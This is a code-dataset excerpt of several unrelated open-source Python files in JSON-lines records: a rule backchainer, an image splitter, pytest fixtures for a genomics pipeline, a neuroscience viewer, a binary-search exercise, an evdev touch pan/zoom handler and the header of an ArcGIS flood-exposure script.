print(tf_model.model(x_test[100:101]))\n","repo_name":"tomal74/artificial-neural-network-Python","sub_path":"projekt.py","file_name":"projekt.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22036456484","text":"from production import AND, OR, NOT, PASS, FAIL, IF, THEN, \\\n match, populate, simplify, variables\nfrom zookeeper import ZOOKEEPER_RULES\nfrom functools import partial\n\n# This function, which you need to write, takes in a hypothesis\n# that can be determined using a set of rules, and outputs a goal\n# tree of which statements it would need to test to prove that\n# hypothesis. Refer to the problem set (section 2) for more\n# detailed specifications and examples.\n\n# Note that this function is supposed to be a general\n# backchainer. 
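(For intuition, an illustrative sketch that is not from the original\n# handout: backchaining 'opus is a penguin' against a rule such as\n# IF( AND( '(?x) is a bird', '(?x) does not fly' ), THEN( '(?x) is a penguin' ) )\n# should produce a goal tree like\n# OR('opus is a penguin', AND('opus is a bird', 'opus does not fly')).)\n# 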
You should not hard-code anything that is\n# specific to a particular rule set. The backchainer will be\n# tested on things other than ZOOKEEPER_RULES.\n\n\ndef backchain_to_goal_tree(rules, hypothesis):\n goal = OR(hypothesis)\n backchain = partial(backchain_to_goal_tree, rules)\n\n for rule in rules:\n csq = rule.consequent()\n if isinstance(csq, str): csq = [csq]\n\n for clause in csq:\n binds = match(clause, hypothesis)\n\n if binds != None:\n ants = rule.antecedent()\n if isinstance(ants, str): ants = [ants]\n\n op = None\n if isinstance(ants, OR): op = OR\n else: op = AND\n\n goal.append(op([backchain(populate(ant, binds)) for ant in ants]))\n\n return simplify(goal)\n\n\n# Here's an example of running the backward chainer - uncomment\n# it to see it work:\n#print backchain_to_goal_tree(ZOOKEEPER_RULES, 'opus is a penguin')\n","repo_name":"rcebulko/AI_Labs","sub_path":"Lab 1/lab1/backchain.py","file_name":"backchain.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24165268770","text":"import os\nimport cv2\nimport time\n\ndir_path = \"../data_raw\"\n\ndic = {\"Air\": \"cam0\", \"Earth\": \"cam1\", \"Fire\": \"cam2\", \"Water\": \"cam3\"}\ndirs = os.listdir(dir_path)\n# print(dirs)\n\nfor dir_name in dirs:\n # print(dir_name)\n if os.path.isdir(os.path.join(dir_path, dir_name)):\n cam_names = dir_name.split(\"_\")\n cam_dir = [os.path.join(\".\", dic[cam_names[i]]) for i in range(len(cam_names))]\n # print(cam_dir)\n for i in range(len(cam_dir)):\n # print(cam_dir[i])\n if not os.path.exists(cam_dir[i]):\n os.mkdir(cam_dir[i])\n # print((os.path.isdir(os.path.join(dir_path, dir_name)))\n\n for img_file in os.listdir(os.path.join(dir_path, dir_name)):\n img = cv2.imread(os.path.join(dir_path, dir_name,img_file))\n # print(img_file)\n img2 = img\n\n height, width, channels = img.shape\n\n for i in range(len(cam_dir)):\n x = int(width/2 * i)\n y = 0\n h = height\n w = int(width / 2)\n # print(x,y, x+w, y+h)\n img = img[y:y+h, x:x+w]\n\n filename = dir_name + \"_\" + img_file[-6:]\n NAME = os.path.join(cam_dir[i], filename) \n cv2.imwrite(NAME,img)\n img = img2","repo_name":"stanfordwhil/kalibr","sub_path":"data/separater.py","file_name":"separater.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"36100034809","text":"import pytest\nimport json\nimport os\n\nfrom unittest import mock\nfrom distutils.dir_util import copy_tree\nfrom pathlib import Path\nfrom functools import partial\nfrom click.testing import CliRunner\nfrom .helpers import ConfigHelper\nfrom BALSAMIC.commands.base import cli\nfrom BALSAMIC import __version__ as balsamic_version\n\nMOCKED_OS_ENVIRON = \"os.environ\"\n\n\n@pytest.fixture\ndef cli_runner():\n \"\"\"click - cli testing\"\"\"\n runner = CliRunner()\n return runner\n\n\n@pytest.fixture\ndef invoke_cli(cli_runner):\n \"\"\"invoking cli commands with options\"\"\"\n return partial(cli_runner.invoke, cli)\n\n\n@pytest.fixture(scope=\"session\")\ndef environ():\n \"\"\"environment process\"\"\"\n return \"os.environ\"\n\n\n@pytest.fixture(scope=\"session\")\ndef config_files():\n \"\"\"dict: path of the config files\"\"\"\n return {\n \"sample\": \"BALSAMIC/config/sample.json\",\n \"analysis_paired\": \"BALSAMIC/config/analysis_paired.json\",\n \"cluster_json\": \"BALSAMIC/config/cluster.json\",\n \"analysis_paired_umi\": 
\"BALSAMIC/config/analysis_paired_umi.json\",\n \"analysis_single\": \"BALSAMIC/config/analysis_single.json\",\n \"analysis_single_umi\": \"BALSAMIC/config/analysis_single_umi.json\",\n \"panel_bed_file\": \"tests/test_data/references/panel/panel.bed\",\n \"background_variant_file\": \"tests/test_data/references/panel/background_variants.txt\",\n \"pon_fastq_path\": \"tests/test_data/fastq/\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef reference():\n \"\"\"reference json model\"\"\"\n return {\n \"reference\": {\n \"reference_genome\": \"tests/test_data/references/genome/human_g1k_v37_decoy.fasta\",\n \"dbsnp\": \"tests/test_data/references/variants/dbsnp_grch37_b138.vcf.gz\",\n \"1kg_snps_all\": \"tests/test_data/references/variants/1k_genome_wgs_p1_v3_all_sites.vcf.gz\",\n \"1kg_snps_high\": \"tests/test_data/references/variants/1kg_phase1_snps_high_confidence_b37.vcf.gz\",\n \"1kg_known_indel\": \"tests/test_data/references/variants/1kg_known_indels_b37.vcf.gz\",\n \"mills_1kg\": \"tests/test_data/references/variants/mills_1kg_index.vcf.gz\",\n \"gnomad_variant\": \"tests/test_data/reference/variants/gnomad.genomes.r2.1.1.sites.vcf.bgz\",\n \"cosmic\": \"tests/test_data/references/variants/cosmic_coding_muts_v89.vcf.gz\",\n \"vep\": \"tests/test_data/references/vep/\",\n \"refflat\": \"tests/test_data/references/genome/refseq.flat\",\n \"refGene\": \"tests/test_data/references/genome/refGene.txt\",\n \"wgs_calling_interval\": \"tests/test_data/references/genome/wgs_calling_regions.v1\",\n \"genome_chrom_size\": \"tests/test_data/references/genome/hg19.chrom.sizes\",\n \"exon_bed\": \"tests/test_data/references/genome/refseq.flat.bed\",\n \"rankscore\": \"tests/test_data/references/genome/cancer_rank_model_-v0.1-.ini\",\n \"access_regions\": \"tests/test_data/references/genome/access-5k-mappable.hg19.bed\",\n \"delly_exclusion\": \"tests/test_data/references/genome/delly_exclusion.tsv\",\n \"delly_exclusion_converted\": \"tests/test_data/references/genome/delly_exclusion_converted.tsv\",\n \"ascat_gccorrection\": \"tests/test_data/references/genome/GRCh37_SnpGcCorrections.tsv\",\n \"ascat_chryloci\": \"tests/test_data/references/genome/GRCh37_Y.loci\",\n \"clinvar\": \"tests/test_data/references/genome/clinvar.vcf.gz\",\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef pon_fastq_path():\n return \"tests/test_data/fastq/\"\n\n\n@pytest.fixture(scope=\"session\")\ndef panel_bed_file():\n return \"tests/test_data/references/panel/panel.bed\"\n\n\n@pytest.fixture(scope=\"session\")\ndef background_variant_file():\n return \"tests/test_data/references/panel/background_variants.txt\"\n\n\n@pytest.fixture(scope=\"session\")\ndef sentieon_license(tmp_path_factory):\n \"\"\"\n Sentieon's license path fixture\n \"\"\"\n sentieon_license_dir = tmp_path_factory.mktemp(\"sentieon_licence\")\n sentieon_license_path = sentieon_license_dir / \"license_file.lic\"\n sentieon_license_path.touch()\n\n return sentieon_license_path.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sentieon_install_dir(tmp_path_factory):\n \"\"\"\n Sentieon's license path fixture\n \"\"\"\n sentieon_install_dir = tmp_path_factory.mktemp(\"sentieon_install_dir\")\n Path(sentieon_install_dir / \"bin\").mkdir(exist_ok=True)\n sentieon_executable = sentieon_install_dir / \"bin\" / \"sentieon\"\n sentieon_executable.touch()\n\n return sentieon_install_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef no_write_perm_path(tmp_path_factory):\n \"\"\"\n A path with no write permission\n \"\"\"\n # create a 
directory with no write permission\n bad_perm_path = tmp_path_factory.mktemp(\"bad_perm_path\")\n\n Path(bad_perm_path).chmod(0o444)\n\n return bad_perm_path.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sample_fastq(tmp_path_factory):\n \"\"\"\n create sample fastq files\n \"\"\"\n fastq_dir = tmp_path_factory.mktemp(\"fastq\")\n fastq_valid = fastq_dir / \"S1_R_1.fastq.gz\"\n fastq_invalid = fastq_dir / \"sample.fastq.gz\"\n\n # dummy tumor fastq file\n tumorfastqr1 = fastq_dir / \"concatenated_tumor_XXXXXX_R_1.fastq.gz\"\n tumorfastqr2 = fastq_dir / \"concatenated_tumor_XXXXXX_R_2.fastq.gz\"\n\n # dummy normal fastq file\n normalfastqr1 = fastq_dir / \"concatenated_normal_XXXXXX_R_1.fastq.gz\"\n normalfastqr2 = fastq_dir / \"concatenated_normal_XXXXXX_R_2.fastq.gz\"\n\n for fastq_file in (\n fastq_valid,\n fastq_invalid,\n tumorfastqr1,\n tumorfastqr2,\n normalfastqr1,\n normalfastqr2,\n ):\n fastq_file.touch()\n\n return {\n \"fastq_valid\": fastq_valid.absolute().as_posix(),\n \"fastq_invalid\": fastq_invalid.absolute().as_posix(),\n \"tumor\": tumorfastqr1.absolute().as_posix(),\n \"normal\": normalfastqr1.absolute().as_posix(),\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef balsamic_cache(tmp_path_factory, reference):\n \"\"\"\n Create a mock balsamic cache (dummy singularity container plus reference.json)\n \"\"\"\n\n cache_dir = tmp_path_factory.mktemp(\"balsamic_cache\")\n\n cache_container = cache_dir / balsamic_version / \"containers\" / \"align_qc\"\n cache_container.mkdir(parents=True, exist_ok=True)\n cache_container_example = cache_container / \"example.sif\"\n cache_container_example.touch()\n\n cache_reference = cache_dir / balsamic_version / \"hg19\"\n cache_reference.mkdir(parents=True, exist_ok=True)\n\n cache_reference_json = cache_reference / \"reference.json\"\n cache_reference_json.touch()\n with open(cache_reference_json, \"w\") as fp:\n json.dump(reference, fp)\n\n return cache_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef analysis_dir(tmp_path_factory):\n \"\"\"\n Creates and returns analysis directory\n \"\"\"\n analysis_dir = tmp_path_factory.mktemp(\"analysis\", numbered=False)\n\n return analysis_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef snakemake_job_script(tmp_path_factory, tumor_normal_config):\n \"\"\"\n Creates a dummy snakemake jobscript\n \"\"\"\n\n script_dir = tmp_path_factory.mktemp(\"snakemake_script\")\n snakemake_script_file = script_dir / \"example_script.sh\"\n snakemake_script = \"\"\"#!/bin/sh\n# properties = {\"type\": \"single\", \"rule\": \"all\", \"local\": false, \"input\": [\"dummy_path\"], \"output\": [\"dummy_path\"], \"wildcards\": {}, \"params\": {}, \"log\": [], \"threads\": 1, \"resources\": {}, \"jobid\": 0, \"cluster\": {\"name\": \"BALSAMIC.all.\", \"time\": \"00:15:00\", \"n\": 1, \"mail_type\": \"END\", \"partition\": \"core\"}}\nls -l # dummy command\n\"\"\"\n snakemake_script_file.touch()\n with open(snakemake_script_file, \"w\") as fn:\n fn.write(snakemake_script)\n\n return {\"snakescript\": str(snakemake_script_file)}\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_normal_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n background_variant_file,\n panel_bed_file,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx -n xxx to create sample config\n for tumor-normal\n \"\"\"\n case_id = \"sample_tumor_normal\"\n tumor = sample_fastq[\"tumor\"]\n normal = sample_fastq[\"normal\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": 
sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-p\",\n panel_bed_file,\n \"-t\",\n tumor,\n \"-n\",\n normal,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--tumor-sample-name\",\n \"ACC1\",\n \"--normal-sample-name\",\n \"ACC2\",\n \"--background-variants\",\n background_variant_file,\n ],\n )\n\n qc_dir = Path(analysis_dir, case_id, \"analysis\", \"qc\", \"multiqc_data\")\n qc_dir.mkdir(parents=True, exist_ok=False)\n copy_tree(\"tests/test_data/qc_files/analysis/qc/multiqc_data/\", qc_dir.as_posix())\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(name=\"helpers\")\ndef fixture_config_helpers():\n \"\"\"Helper fixture for case config files\"\"\"\n return ConfigHelper()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_normal_wgs_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx -n xxx to create sample config\n for tumor-normal\n \"\"\"\n case_id = \"sample_tumor_normal_wgs\"\n tumor = sample_fastq[\"tumor\"]\n normal = sample_fastq[\"normal\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-t\",\n tumor,\n \"-n\",\n normal,\n \"--case-id\",\n case_id,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--analysis-dir\",\n analysis_dir,\n ],\n )\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_only_config(\n tmpdir_factory,\n sample_fastq,\n balsamic_cache,\n background_variant_file,\n analysis_dir,\n panel_bed_file,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx to create sample config\n for tumor only\n \"\"\"\n case_id = \"sample_tumor_only\"\n tumor = sample_fastq[\"tumor\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-p\",\n panel_bed_file,\n \"-t\",\n tumor,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--background-variants\",\n background_variant_file,\n ],\n )\n\n qc_dir = Path(analysis_dir, case_id, \"analysis\", \"qc\", \"multiqc_data\")\n qc_dir.mkdir(parents=True, exist_ok=False)\n copy_tree(\"tests/test_data/qc_files/analysis/qc/multiqc_data/\", qc_dir.as_posix())\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_only_wgs_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx to create sample config\n for tumor only\n \"\"\"\n case_id = \"sample_tumor_only_wgs\"\n tumor = sample_fastq[\"tumor\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-t\",\n tumor,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n 
analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n ],\n )\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sample_config():\n \"\"\"\n sample config dict to test workflow utils\n \"\"\"\n sample_config = {\n \"QC\": {\n \"picard_rmdup\": \"False\",\n \"adapter\": \"AATGATACGGCGACCACCGAGATCTACACTCTTTCCCTACACGACGCTCTTCCGATCT\",\n \"min_seq_length\": \"25\",\n \"quality_trim\": \"True\",\n \"adapter_trim\": \"False\",\n \"umi_trim\": \"True\",\n \"umi_trim_length\": \"5\",\n },\n \"analysis\": {\n \"case_id\": \"id1\",\n \"analysis_type\": \"paired\",\n \"analysis_dir\": \"tests/test_data/\",\n \"fastq_path\": \"tests/test_data/id1/fastq/\",\n \"script\": \"tests/test_data/id1/scripts/\",\n \"log\": \"tests/test_data/id1/logs/\",\n \"result\": \"tests/test_data/id1/analysis/\",\n \"config_creation_date\": \"yyyy-mm-dd xx\",\n \"BALSAMIC_version\": \"2.9.8\",\n \"dag\": \"tests/test_data/id1/id1_analysis.json_BALSAMIC_2.9.8_graph.pdf\",\n },\n \"vcf\": {\n \"manta\": {\"mutation\": \"somatic\", \"type\": \"SV\"},\n \"vardict\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"pindel\": {\"mutation\": \"somatic\", \"type\": \"SV\"},\n \"strelka\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"mutect\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnscope\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnsnv\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnhaplotyper\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"dnascope\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n \"manta_germline\": {\"mutation\": \"germline\", \"type\": \"SV\"},\n \"haplotypecaller\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n \"strelka_germline\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n },\n \"samples\": {\n \"S1_R\": {\n \"file_prefix\": \"S1_R\",\n \"type\": \"tumor\",\n \"readpair_suffix\": [\"1\", \"2\"],\n },\n \"S2_R\": {\n \"file_prefix\": \"S2_R\",\n \"type\": \"normal\",\n \"readpair_suffix\": [\"1\", \"2\"],\n },\n },\n \"umiworkflow\": \"true\",\n }\n\n return sample_config\n\n\n@pytest.fixture(scope=\"session\")\ndef analysis_path():\n \"\"\"Analysis test path\"\"\"\n return \"tests/test_data/qc_files/analysis\"\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_metrics():\n \"\"\"Sample data for QC model testing\"\"\"\n return {\n \"qc\": {\n \"targeted\": {\n \"multiqc_picard_insertSize.json\": {\n \"MEAN_INSERT_SIZE\": {\"condition\": None}\n },\n \"multiqc_picard_HsMetrics.json\": {\n \"MEDIAN_TARGET_COVERAGE\": {\n \"condition\": {\"norm\": \"gt\", \"threshold\": 500.0}\n }\n },\n },\n \"wgs\": {\n \"multiqc_picard_insertSize.json\": {\n \"MEAN_INSERT_SIZE\": {\"condition\": None}\n },\n \"multiqc_picard_dups.json\": {\n \"PERCENT_DUPLICATION\": {\"condition\": None}\n },\n },\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_extracted_metrics():\n \"\"\"Extracted metrics for QC model testing\"\"\"\n return {\n \"metrics\": {\n \"sample_1\": [\n {\n \"name\": \"MEAN_INSERT_SIZE_1\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n {\n \"name\": \"MEAN_INSERT_SIZE_2\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n ],\n \"sample_2\": [\n {\n \"name\": \"MEAN_INSERT_SIZE_1\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n ],\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_raw_targeted_metrics():\n \"\"\"Raw metrics\"\"\"\n return {\n \"default\": {\n \"metrics_1.json\": {\"METRIC_1\": 0.1, \"METRIC_2\": 
0.2},\n \"metrics_2.json\": {\"METRIC_3\": 0.3},\n },\n \"panel_1.bed\": {\"metrics_2.json\": {\"METRIC_4\": 0.4}},\n \"panel_2.bed\": {\"metrics_1.json\": {\"METRIC_1\": 0.5, \"METRIC_4\": 0.4}},\n }\n","repo_name":"jxshi/BALSAMIC","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":17370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"71522955611","text":"from neuroanalysis.ui.nwb_viewer import MiesNwbViewer\nfrom neuroanalysis.miesnwb import MiesNwb\n\nfrom .multipatch_view import MultipatchMatrixView\nfrom aisynphys.data import MultiPatchDataset\nfrom .pair_view import PairView\n\n\nclass MultipatchNwbViewer(MiesNwbViewer):\n def create_views(self):\n MiesNwbViewer.create_views(self)\n \n add_views = [\n ('Matrix', MultipatchMatrixView(self)),\n ('Pair', PairView(self)),\n ]\n for name, view in add_views:\n self.tabs.addTab(view, name)\n \n def load_nwb(self, filename):\n nwb = MultiPatchDataset(filename)\n self.set_nwb(nwb)\n return nwb\n","repo_name":"timjarsky/aisynphys","sub_path":"aisynphys/ui/multipatch_nwb_viewer.py","file_name":"multipatch_nwb_viewer.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27059262138","text":"import sys\n\n\nN, M = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\n\ndef binary_search(start, end):\n while(start <= end):\n global r\n result = 0\n mid = (start + end) // 2\n\n for i in arr:\n if i >= mid:\n result += i-mid\n \n # the leftover pieces must total at least M; keep this height\n # and search higher to maximize the cutter height\n if result >= M:\n r = mid\n start = mid+1\n else:\n end = mid-1\n\n\nr = 0\nbinary_search(0, max(arr))\n\nprint(r)","repo_name":"okok0415/Algorithm","sub_path":"Coding_Test/Python/Algorithm/Search/(Book) 떡볶이 떡 만들기.py","file_name":"(Book) 떡볶이 떡 만들기.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1509938129","text":"import selectors\nimport evdev\nfrom threading import Thread\nfrom evdev import ecodes\nfrom pan_zoom_state import PanZoomState\n\n\nclass DeviceState:\n def __init__(self, device, multitouch):\n self.device = device\n self.multitouch = multitouch\n self.fingers_down = 0\n self.abs_pressure = 0\n self.drag_start_x = None\n self.drag_start_y = None\n\n\nclass TouchInputHandler:\n def __init__(self, pan_zoom_state):\n self.pan_zoom_state = pan_zoom_state\n self.grabbed_devices = dict()\n self.stop_requested = False\n\n def listen(self):\n try:\n selector = selectors.DefaultSelector()\n devices = [evdev.InputDevice(path) for path in evdev.list_devices()]\n device_info = dict()\n for device in devices:\n capabilities = device.capabilities(verbose=False)\n mt = is_mt_touch_device(capabilities)\n if mt or is_touch_device(capabilities):\n print(device.path, device.name, device.phys)\n abs_info_abs_x = extract_absinfo(capabilities, ecodes.ABS_X)\n abs_info_abs_y = extract_absinfo(capabilities, ecodes.ABS_Y)\n if abs_info_abs_x is None or abs_info_abs_y is None:\n print(\"No abs_info found on x or y for device \" + device.name)\n continue\n device_info[device.path] = (abs_info_abs_x, abs_info_abs_y)\n selector.register(device, selectors.EVENT_READ)\n self.grabbed_devices[device.path] = DeviceState(device, mt)\n device.grab()\n\n while not self.stop_requested:\n for ready in selector.select(1):\n if not ready:\n continue\n key, mask = ready\n device = key.fileobj\n (abs_info_abs_x, 
abs_info_abs_y) = device_info[device.path]\n x_size = abs_info_abs_x.max - abs_info_abs_x.min\n y_size = abs_info_abs_y.max - abs_info_abs_y.min\n for event in device.read():\n if event.type == ecodes.EV_ABS:\n if event.code == ecodes.ABS_X:\n if self.grabbed_devices[device.path].drag_start_x is not None:\n self.pan_zoom_state.pan_relative(delta_x=(self.grabbed_devices[device.path].drag_start_x - event.value) / x_size)\n self.grabbed_devices[device.path].drag_start_x = event.value\n if event.code == ecodes.ABS_Y:\n if self.grabbed_devices[device.path].drag_start_y is not None:\n self.pan_zoom_state.pan_relative(delta_y=(self.grabbed_devices[device.path].drag_start_y - event.value) / y_size)\n self.grabbed_devices[device.path].drag_start_y = event.value\n if event.code == ecodes.ABS_MT_TRACKING_ID:\n if event.value == -1:\n self.grabbed_devices[device.path].fingers_down = max(0, self.grabbed_devices[device.path].fingers_down - 1)\n else:\n self.grabbed_devices[device.path].fingers_down = self.grabbed_devices[device.path].fingers_down + 1\n if self.grabbed_devices[device.path].fingers_down == 0:\n self.grabbed_devices[device.path].drag_start_x = None\n self.grabbed_devices[device.path].drag_start_y = None\n if event.code == ecodes.ABS_PRESSURE:\n pressure = event.value\n self.grabbed_devices[device.path].abs_pressure = pressure\n if not self.grabbed_devices[device.path].multitouch:\n if pressure <= 0:\n self.grabbed_devices[device.path].drag_start_x = None\n self.grabbed_devices[device.path].drag_start_y = None\n finally:\n for device_state in self.grabbed_devices.values():\n device_state.device.ungrab()\n\n def stop(self):\n self.stop_requested = True\n\n\ndef is_touch_device(capabilities):\n for prop in (ecodes.ABS_X, ecodes.ABS_Y, ecodes.ABS_PRESSURE):\n if extract_absinfo(capabilities, prop) is None:\n return False\n return True\n\n\ndef is_mt_touch_device(capabilities):\n for prop in (ecodes.ABS_X, ecodes.ABS_Y, ecodes.ABS_MT_TRACKING_ID):\n if extract_absinfo(capabilities, prop) is None:\n return False\n return True\n\n\ndef extract_absinfo(capabilities, type):\n try:\n abs_info_entries = capabilities[ecodes.EV_ABS]\n for abs_info_entry in abs_info_entries:\n if abs_info_entry[0] == type:\n return abs_info_entry[1]\n return None\n except KeyError:\n return None\n\n\nif __name__ == '__main__':\n handler = TouchInputHandler(PanZoomState(1920, 1080, 10, 1920, 180))\n Thread(target=handler.listen, args=()).start()\n","repo_name":"enguerrand/magnipy","sub_path":"touch_input_handler.py","file_name":"touch_input_handler.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44617198703","text":"\"\"\"\r\nCreated on Mon Apr 19 18:32:50 2021\r\n\r\n@author: uqgpere2 : Gabriel Perez Murillo UQ-SMI \r\n@author: g.perezmurillo@uq.edu.au\r\n\r\nThis script calculates the FEI for different simulations as:\r\n\r\n FEI = FPI x Flood Hazard\r\n\r\nInputs:\r\n 1. Excel files with FPI values for different simulations\r\n 2. Excel files with Hazard values for different simulations\r\n 2. Excel file with the location of the input files (1 & 2)\r\n\"\"\"\r\n#* This script is free software; you can redistribute it and/or modify *\r\n#* it under the terms of the GNU General Public License as published by *\r\n#* the Free Software Foundation; either version 2 of the License, or *\r\n#* any later version. 
*\r\n\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n# WARNING\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n# This was written under python 2 (ArcGIS 10.8)\r\n\r\n# This script imports acrpy (you need an ARCGIS license)\r\n\r\n# YOU need to execute these scripts previously:\r\n# \r\n# Generate_Flood_Proximity_Index_for_a_list_of_simulations.py \r\n# Extract_Flood_Hazard_to_TSFs_based_on_FPI.py \r\n# \r\n\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n# WARNING\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n\r\n\r\n###############################################################################\r\n#%% PACKAGES YOU NEED TO LOAD\r\n###############################################################################\r\n\r\n# These are the packages you need to load files\r\n\r\nimport sys\r\nimport string \r\nimport os\r\nimport math\r\nimport traceback\r\nimport glob\r\nimport itertools\r\n\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\n\r\nimport arcpy\r\nfrom arcpy.sa import *\r\n\r\nimport time\r\nfrom datetime import datetime\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\n\r\n# Allow output to overwrite...\r\narcpy.env.overwriteOutput = True\r\n\r\n# Check out the ArcGIS Spatial Analyst extension license\r\narcpy.CheckOutExtension(\"Spatial\")\r\n\r\n###############################################################################\r\n#%% PACKAGES YOU NEED TO LOAD\r\n###############################################################################\r\n\r\n###############################################################################\r\n#%% DEFINITION OF FILE LOCATIONS\r\n###############################################################################\r\n\r\n# Path of the main folder for the simulations\r\ncurrent_working_directory=r'C:\\00-C-GPM_INFO\\04-C-RDM\\04-C-02-Python\\04-C-02-03-TSFs-Exposure' \r\n\r\n# INPUTS FOLDER NAMES----------------------------------------------------------\r\n\r\n# Folder name with inputs files\r\nInput_files_folder_name= r'04-Inputs-files'\r\n\r\n# Folder name with input rasters\r\nInput_rasters_folder_name= r'05-Inputs-rasters'\r\n\r\n# Folder name with input shapefiles\r\nInput_shapes_folder_name= r'06-Inputs-shapes'\r\n\r\n# OUTPUT FOLDER NAMES----------------------------------------------------------\r\n\r\n# the output files folder\r\nOutput_files_folder_name= r'07-Results-files'\r\n\r\n# Folder name with output shapefiles\r\nOutput_rasters_folder_name= r'08-Results-rasters'\r\n\r\n# Folder name with output rasters\r\nOutput_shapes_folder_name= r'09-Results-shapes'\r\n\r\n# RESULTS FOLDER NAMES---------------------------------------------------------\r\n\r\n# Folder name with exposure rasters\r\nOutput_folder_FEI_shps= r'FEI_SHPs'\r\n\r\n# 